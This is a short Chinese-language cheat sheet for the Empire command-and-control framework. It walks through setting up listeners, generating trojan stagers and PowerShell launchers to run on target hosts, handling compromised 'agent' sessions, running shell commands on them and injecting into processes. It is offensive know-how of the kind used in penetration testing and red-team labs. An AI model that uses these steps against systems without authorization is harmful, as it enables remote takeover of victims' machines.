一、基本命令:(##注意Empire下命令区分大小写##)
1、启动Empire后,首先查看一下命令帮助信息
help
二、设置监听器:
与coblatstrike类似,也是要先创建Linstener,然后后续操作选择生成的监听器即可,与CS不同的是:当开启多个监听时,必须使用不同的名称、不同的端口
1、进入listeners界面:
listeners
查看命令帮助
help
2、创建Listener:
uselistener命令,可以通过空格+双击tab键,看到一共有7种Listener,一般常用的是:http、http_foreign、meterpreter、redirector,其他的不怎么用
创建Listener:
①选择监听器类型
uselistener <监听器类型>
②查看所需配置
info
③设置相关配置并启动监听
set Name <自定义名称>set Host <服务器ip>set Port <监听端口>execute #执行监听器
back返回listeners界面即可看到监听器列表
list
④删除监听器
kill <监听器名称>
三、生成木马stagers:
在listeners界面下操作,通过usestager,空格+双击tab键可以看到支持的所有stagers,
multi是通用模块、osx是mac操作系统、然后就是windows的模块
①生成stager:
usestager <模块名称> set listener <监听器名称> execute #执行生成
然后会在/tmp/目录下生成木马文件,在目标主机运行就会上线
②使用launcher命令:
launcher <语言> <监听器名称>
将生成的这段payload在有powershell的目标机上执行,就会上线
③操作agents(会话):
1.查看会话列表:
agents #相当于msf的sessions命令
重命名agents:
rename <会话名称> <新的名称>
2.进入会话:
interact <会话名称>
back命令就可以实现将会话放置后台了
3.杀死会话:
kill <会话名称> 先执行remove <会话名称> 再执行
4.agents具体命令操作:
很多命令和MSF的meterpreter会话操作差不多
常用命令:
help agentcmds
执行cmd命令:
shell +命令
四、进程注入:
ps #查看进程PID
注入进程:
usemodule management/psinject set ProcId set Listener <监听器名称> execute
注入成功会返回一个新的agent会话
